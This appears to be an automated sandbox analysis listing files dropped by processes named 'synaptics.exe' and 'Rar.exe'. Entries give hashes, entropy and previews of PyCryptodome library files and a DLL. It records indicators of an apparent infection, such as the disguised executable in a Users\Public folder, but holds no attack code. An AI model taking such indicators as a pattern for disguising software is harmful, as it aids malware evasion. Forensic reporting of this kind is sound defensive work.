                                                                                                                                                                                      SSDEEP:12:C4jXHzW76nDBG45OUZLvZHLSIj0pPvZHLOkvZHLa8lhTKJgD:TjMiFLvZWIjUvZ5vZGwh5
                                                                                                                                                                                      MD5:A7472E2CA84BA4DE83FBF8CF1179E5DC
                                                                                                                                                                                      SHA1:7F8A895411D254F56F4294810D152594425AAD4E
                                                                                                                                                                                      SHA-256:5D03BEA584D595DA32839919352921B3E3EC33EDC2DFC5E512886DD5735A108A
                                                                                                                                                                                      SHA-512:803E5824DC912A86011A11F3D4EDF1EC7DB7A263A07B099F52A793CB5E18C5BF00CFF67BC78BAF9C678295AF9FAA31A7DD3E4E34E68ABFD12C7EB35B0DAE3E32
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.g.Z.z.d.d.l.m.Z...d.d.l.m.Z...W.d.S...e.e.e.f.yB......z.d.d.l.m.Z...d.d.l.m.Z...W.Y.d.S...e.e.f.yA......d.d.l.m.Z...i.Z.Y.Y.d.S.w.w.)...Integer.....)...IntegerGMP)...implementation)...IntegerCustom)...IntegerNativeN)...__all__Z.Crypto.Math._IntegerGMPr....r....r....Z._implementation..ImportError..OSError..AttributeErrorZ.Crypto.Math._IntegerCustomr....Z.Crypto.Math._IntegerNativer......r....r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\Numbers.py..<module>....s..............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7442
                                                                                                                                                                                      Entropy (8bit):5.519481103300708
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:sfN8ODJyBGU8lODJq3D6Gd5+zbXQO5qcUd:sqc3OGdmtW
                                                                                                                                                                                      MD5:59C454D6D589E66F1AAFF2DE61861942
                                                                                                                                                                                      SHA1:8D23E1F86012322F06072CDC0D2112DE9878012A
                                                                                                                                                                                      SHA-256:7EFD0A16A38975C123597BED26E94744C48A5F9B721CC1F1F6BE6F371CA37019
                                                                                                                                                                                      SHA-512:59B9ABC2BF6FBD7586D84B1C3CC739E77D0007EE130A233A35655CFBCCDCE4D567EF64E1536D1F8B73214DDE8A2601BB34A80ECDDAD659227B2696592E7441D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s|...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d.d...Z.d.d...Z.d.d.l.m.Z...e.e.d.d.......Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).zHFunctions to create and test prime numbers...:undocumented: __package__......)...Random)...Integer)...iter_range.....Nc....................C...s<...t.|.t...s.t.|...}.|.d.v.r.t.S.|.....r.t.S.t.d...}.t.|.d.....}.|.d.u.r(t.....j.}.t.|...}.d.}.|.....r>|.d.L.}.|.d.7.}.|.....s2t.|...D.]Y}.d.}.|.|.|.f.v.rlt.j.d.|.d...|.d...}.d.|.....k.rc|.d...k.sfJ.....J...|.|.|.f.v.sLt.|.|.|...}.|.|.|.f.v.ryqBt.d.|...D.].}.t.|.d.|...}.|.|.k.r...n.|.|.k.r.t.........S.q~t.....S.qBt.S.).a:...Perform a Miller-Rabin primality test on an integer... The test is specified in Section C.3.1 of `FIPS PUB 186-4`__... :Parameters:. candidate : integer. The number to test for primality.. iterations : integer. The maximum number of iterations to perform before. declaring a candidate a probable prime.. randfunc
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11443
                                                                                                                                                                                      Entropy (8bit):4.986033275730306
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:uj5Panlqjgi/xVcz2QRUtIs3J3Aqqk0ruPuRfNob3l8kKlzC2WrUkvh:ujMlqjgEVcz2QCtIs3J3AqJZb36kK5Ct
                                                                                                                                                                                      MD5:F52CBC77CF2531E104A6CB0E7E9527A9
                                                                                                                                                                                      SHA1:804BF1581F24DA5EDAC71B3708B5FE87A89E13A0
                                                                                                                                                                                      SHA-256:25DD556DD8062AFFEE252BF331C33DA7C5257BB904DD8EC2C415910B68B6DA8F
                                                                                                                                                                                      SHA-512:989C6801CEA4FEE23119A2625A25EEF41C65095FB709302311F63F3DB31ECBA0A5F67B58423905C72F28B48CCA95590783247233D0FA6168DDB7D389893AA3CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s@...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N)...iter_range..bord..bchr..ABC)...Randomc....................@...s....e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.dhd.d.....Z.e.e.j.did.d.......Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d ....Z.e.j.d!d"....Z.e.j.d#d$....Z.e.j.d%d&....Z.e.j.djd(d)....Z.e.j.djd*d+....Z.e.j.d,d-....Z.e.j.djd.d/....Z.e.j.d0d1....Z.e.j.d2d3....Z.e.j.d4d5....Z.e.j.d6d7....Z e.j.d8d9....Z!e.j.d:d;....Z"e.j.d<d=....Z#e.j.d>d?....Z$e.j.d@dA....Z%e.j.dBdC....Z&e.j.dDdE....Z'e.j.dFdG....Z(e.j.dHdI....Z)e.j.dJdK....Z*e.j.dLdM....Z+e.j.dNdO....Z,e.j.dPdQ....Z-e.j.dRdS....Z.e.j.dTdU....Z/e.j.dVdW....Z0e.j.dXdY....Z1e.j.dZd[....Z2e.j.d\d]....Z3e.e.j.d^d_......Z4e.d`da....Z5e6dbdc....Z7e6ddde....Z8e.e.j.dfdg......Z9d'S.)k..IntegerBasec....................C........d.S...N......selfr....r.....JC:\Us
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2963
                                                                                                                                                                                      Entropy (8bit):5.417697241112068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:vXkxRn/584h+MihBCNnK3FN1UfeLdyyVNRYtCmVMclu06OJGsvpuI9vprfgDzkWp:vXkv/YXhB829bgkmVMeX6cp1prfgDHb9
                                                                                                                                                                                      MD5:03A3FCE262B431FA36E054810A31CE90
                                                                                                                                                                                      SHA1:065BC683022DB53C3F451519A1296DB3A7981958
                                                                                                                                                                                      SHA-256:7B0BC960DFE03746D6E3A1C444C4982B27D4A08252731E25D1973FC351CD07C3
                                                                                                                                                                                      SHA-512:01A32808755DB935650E82703095AE5738C3CA05A90E5205DAD9769C0B4F4A897D6FE873CB94216BEB38B88B1D4A7B012AEE039DE1236F2F275473A106EA6034
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...st...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.d.e...Z.d.e.d...Z.G.d.d...d.e...Z.d.S.)......)...IntegerNative.....)...long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..backend..c_size_t..c_ulonglong)...getrandbitsa.....int monty_pow(uint8_t *out,. const uint8_t *base,. const uint8_t *exp,. const uint8_t *modulus,. size_t len,. uint64_t seed);..int monty_multiply(uint8_t *out,. const uint8_t *term1,. const uint8_t *term2,. const uint8_t *modulus,. size_t len);.z.Crypto.Math._modexpZ.custom)...library..apic....................@...s0...e.Z.d.Z.e.d.d.d.....Z.d.d.d...Z.e.d.d.....Z.d.S.)...IntegerCustom..bigc....................C...s8...|.d.k.r.n.|.d.k.r.t.|...}.|.......n.t.d.....t.t.|.....S.).Nr......lit
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 512-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, maximum point enabled, userbration: offset 0.000000, slope 128.000000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20453
                                                                                                                                                                                      Entropy (8bit):5.2861292003326135
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QHCMZp3pZsEbpnho9ak9blkWhHJM+RS23v6rzlW1353/dsgu2OgRK:NMZxpGapnhrk9blkWNEHIpRuIRK
                                                                                                                                                                                      MD5:A5B62210B93CF8A845341138C0DC27FB
                                                                                                                                                                                      SHA1:9D4270781DCB477A78E99505B93C52C9759C990E
                                                                                                                                                                                      SHA-256:47AE6D7EA3C41BF56F017ADD144BC0F7590528EB8285D4CCA9059928921ECC4E
                                                                                                                                                                                      SHA-512:4BE9408AF969C6329CF78D093BA0AF39B46E680D331F7D57800327B5603DC3FD314D10C66E94A5170D8A966BEE35C7F06487DA9478B0E5D0A2237EBCAA8FFF07
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fUn.......................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.j.d.k.r3e.d.....e.d.e...Z.d.e.d...Z.e.e.d...rFe.d.....e.d...d.k.red.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.d...Z.n.d.d.l.m.Z...d.d...Z.G.d.d...d.e...Z.e...Z G.d.d...d.e...Z!d.S.)......N)...tobytes..is_native_int)...backend..load_lib..get_raw_buffer..get_c_string..null_pointer..create_string_buffer..c_ulong..c_size_t..c_uint8_ptr.....)...IntegerBaseaY...typedef unsigned long UNIX_ULONG;. typedef struct { int a; int b; void *c; } MPZ;. typedef MPZ mpz_t[1];. typedef UNIX_ULONG mp_bitcnt_t;.. void __gmpz_init (mpz_t x);. void __gmpz_init_set (mpz_t rop, const mpz_t op);. void __gmpz_init_set_ui (mpz_t rop, UNIX_ULONG op);.. UNIX_ULONG __gmpz_get_ui (const mpz_t op);. void __gmpz_set (mpz_t rop, const mpz_t op);. void __gmpz_set_ui (mpz_t rop, UNIX_ULONG op);. void __gmpz_add (mpz_t rop, co
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10703
                                                                                                                                                                                      Entropy (8bit):4.874587424670691
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yfddwtdzk05NpqTIIsPg96w9MOpdClFUeh/z5p3SCS2gp/cj1GiXB6ITVaw3+3Zz:y3OdzN5NpqTIIsEVFnG7h/LSCS2i0j1o
                                                                                                                                                                                      MD5:AD5F1E528713BBFDAFE882E131D8D7A0
                                                                                                                                                                                      SHA1:27AF0BF429E531584DA3B2F96C4CE4CDED31FBA4
                                                                                                                                                                                      SHA-256:C53E701770946807B7124AFCA8572167D5B7C55EDF2D648B340EB6651E5E4607
                                                                                                                                                                                      SHA-512:ED10F604886F085A5D3ED401E41B0627FABF25AD6D764E6FE8387D983A974531DBF3E70A63C95C683465AD9671AC51A633CDD43C246761197F6642A7C6FD3A7A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s8...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.S.)......)...IntegerBase.....)...long_to_bytes..bytes_to_long..inverse..GCDc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.did.d...Z.e.djd.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e.Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.dkd/d0..Z.dkd1d2..Z.d3d4..Z.dkd5d6..Z.d7d8..Z.d9d:..Z d;d<..Z!d=d>..Z"d?d@..Z#dAdB..Z$dCdD..Z%dEdF..Z&dGdH..Z'dIdJ..Z(dKdL..Z)dMdN..Z*dOdP..Z+dQdR..Z,dSdT..Z-dUdV..Z.dWdX..Z/dYdZ..Z0d[d\..Z1d]d^..Z2d_d`..Z3dadb..Z4dcdd..Z5e6dedf....Z7e6dgdh....Z8d.S.)l..IntegerNativez3A class to model a natural integer (including zero)c....................C...s<...t.|.t...r.t.d.....z.|.j.|._.W.d.S...t.y.......|.|._.Y.d.S.w.).Nz-A floating point type is not a natural number)...isinstance..float..ValueError.._value..AttributeError)...self..value..r.....LC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\_In
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):163
                                                                                                                                                                                      Entropy (8bit):4.619118590995775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/hcGllluleh/wZWejIaHF50YTlHX0M9VWrz4mLOkcTgp:y/Vl/qeh/wvIaHxEM9ArMF4
                                                                                                                                                                                      MD5:F46A4082231B706D0CC924A76F6FBDE2
                                                                                                                                                                                      SHA1:07A389746C9BF8A2FC47131C3770F7722937C90A
                                                                                                                                                                                      SHA-256:C074FC6E78CE9F124B53DA1B9556E441A7AA18092A6C6260C69E09DF5239EFF7
                                                                                                                                                                                      SHA-512:E138409D74E0856338B365FA1BDDF58415B42EC6BE1AC3A8F5ED1D1DECDAABECEE23BF08FB07763C92805BD65131F995A928DA1BE722D838D18987ECECF908A0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.S.).N..r....r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32256
                                                                                                                                                                                      Entropy (8bit):6.222169874586115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:nGyDeWs5BywFLl4OwhjU7/QnHO0VjNECtu9nBI+:nUBPd7oH5/Ftu9m+
                                                                                                                                                                                      MD5:8C6F920D10A6E8350E269DD2E3E7062C
                                                                                                                                                                                      SHA1:00AC132AF7896696337DF65BA95686883169FE54
                                                                                                                                                                                      SHA-256:8A6FF91276C58BF8F524DD2419AEB9C218B3E369C27113A264DC412F08A89650
                                                                                                                                                                                      SHA-512:8DAC845BAB134B7169D4134891884D9CD5DD431C24DA8DDE98D89EF6D858DF775C3D770CB3CDBEBC410BF2C16A87CA75D52AAC7DAE18CFB7D557E2771EFC5A0A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........em...>...>...>...>...>...?...>...?...>...>...>...?...>...?...>...?...>...?...>...?...>...>...>...?...>Rich...>........................PE..L...<..e...........!...%.`..........T........p............................................@..........................u..|...|u..d....................................q...............................p..@............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data...p............n..............@....rsrc................x..............@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3274
                                                                                                                                                                                      Entropy (8bit):4.693836120739867
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:gY+1BttCqDO2HfgdO3dSXWxAzPB0d8vHWHN6xCvsrWjWO7K1T+vEZq9KsDsD/:ZKBttCqDO2/1AzpatLjST+vt9+/
                                                                                                                                                                                      MD5:05BAB8AC5A99E7F1E3A930AD0241310A
                                                                                                                                                                                      SHA1:1C86AE14E272E56C5F7F9B674222AC5C72E5FAA1
                                                                                                                                                                                      SHA-256:1FBA768D59659EAE57CFBF6E2DD703365744B49FE47BB8EEE11A80A129597735
                                                                                                                                                                                      SHA-512:FBE7D4C991EFAB21EA6D2E6B1FB98B014C2F823003BF65957B81587B6C19C01FBE2527232EC8B23AE59057A966D1103E6B193CD86CE9CB2E479D5861FFEC9D43
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from Crypto.Util.number import long_to_bytes..from Crypto.PublicKey.ECC import EccKey......def _compute_ecdh(key_priv, key_pub):.. # See Section 5.7.1.2 in NIST SP 800-56Ar3.. pointP = key_pub.pointQ * key_priv.d.. if pointP.is_point_at_infinity():.. raise ValueError("Invalid ECDH point").. z = long_to_bytes(pointP.x, pointP.size_in_bytes()).. return z......def key_agreement(**kwargs):.. """Perform a Diffie-Hellman key agreement..... Keywords:.. kdf (callable):.. A key derivation function that accepts ``bytes`` as input and returns.. ``bytes``... static_priv (EccKey):.. The local static private key. Optional... static_pub (EccKey):.. The static public key that belongs to the peer. Optional... eph_priv (EccKey):.. The local ephemeral private key, generated for this session. Optional... eph_pub (EccKey):.. The ephemeral public key, received from the peer for this session. Optional..... At le
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):482
                                                                                                                                                                                      Entropy (8bit):5.105314197006538
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYB9mNRE1BgS+1dwCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1R+169gvC/gyfyv
                                                                                                                                                                                      MD5:69A7EFD78AFDEF04820558CECC146AE6
                                                                                                                                                                                      SHA1:3CF02E290E2C748FEB0AA29B55FB9C8BE7421E81
                                                                                                                                                                                      SHA-256:FC079D87295B952D7A52929D205ED7BBED1EE2741479E96337FA7EBC9428A26A
                                                                                                                                                                                      SHA-512:8F1CD56424FC12C86AA16ED0DBC076E2D0FA7714CE93F4D9B1C109BB661285563E4AA2918C48A2DC076B945ED2207197F53683946E29C78F1B9F32E668E54F03
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Crypto.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22955
                                                                                                                                                                                      Entropy (8bit):4.822109096386609
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:We0Nt96AroMwVVlrV4ENoDZtzQNzRS1zyid3KKKXVvEtUa:9wt5kV4QoDZAzRCnKlm
                                                                                                                                                                                      MD5:78EA2251CC2560710EFF6D782F1C705E
                                                                                                                                                                                      SHA1:92A4E050AE5883220F461FC01ED7C0CA1ED4DF16
                                                                                                                                                                                      SHA-256:F47D981850B12CD0ECE583D13EF5F29F0BF72D60A2D089C3FC093F02EA5D1746
                                                                                                                                                                                      SHA-512:E52616C1DFB149357FBD8B59D0E0CF392362A03065DC232354D1061DA393F5E30C030A950998A99AD606698E2AA4A769F9D9FD6A3A09281736B1168E5A023329
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# coding=utf-8..#..# KDF.py : a collection of Key Derivation Functions..#..# Part of the Python Cryptography Toolkit..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2038
                                                                                                                                                                                      Entropy (8bit):4.91503915615325
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                                                                      MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                                                                      SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                                                                      SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                                                                      SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9056
                                                                                                                                                                                      Entropy (8bit):4.7874787545071635
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oqrskrs9t3q/IG1RYr24zEqG5TFiW4m1DH/T:Xrskrs9VqPaQqSTFiWV7
                                                                                                                                                                                      MD5:8F0F67CEDF28EC2C022DC31587D03BB5
                                                                                                                                                                                      SHA1:86EC75E3ACBF09488E0592A026F40FF26A27BBF5
                                                                                                                                                                                      SHA-256:4DB85B5FF214482B6A912C0E90E73F8164B54AC4CC69390DE67024A4B6FD164D
                                                                                                                                                                                      SHA-512:B6EC5234AF9CC7C513D7FD95BD1638177B0778FA65E19813319B7951B3846F3F83BADC4CFD85FA465CB98886CA73F206228FA336F0F62FFA8E23E455A1BC5BE0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# SecretSharing.py : distribute a secret amongst a group of participants..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):820
                                                                                                                                                                                      Entropy (8bit):4.725635475246741
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                                                                      MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                                                                      SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                                                                      SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                                                                      SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1585
                                                                                                                                                                                      Entropy (8bit):5.205262016568805
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHm:MwDqrYJALrYJHdt3EHGuIG
                                                                                                                                                                                      MD5:359E5E3040820102CF68398BFCEF8840
                                                                                                                                                                                      SHA1:893ABCEC60366D62B13FC6679599EFFFBEFF1450
                                                                                                                                                                                      SHA-256:5E519AC6FBC45FDC85A460E0DDAD070BAF48BC16C1BA2906A67168F89E3F0899
                                                                                                                                                                                      SHA-512:953D5D7B66792121BFE24C805B33704E9B2491EB956BAB0F82497455E3CD1388E7DD134685D56E38E6D10D5B45894FA2D9DEBFCAFD53E21D5A600892A11A63BD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
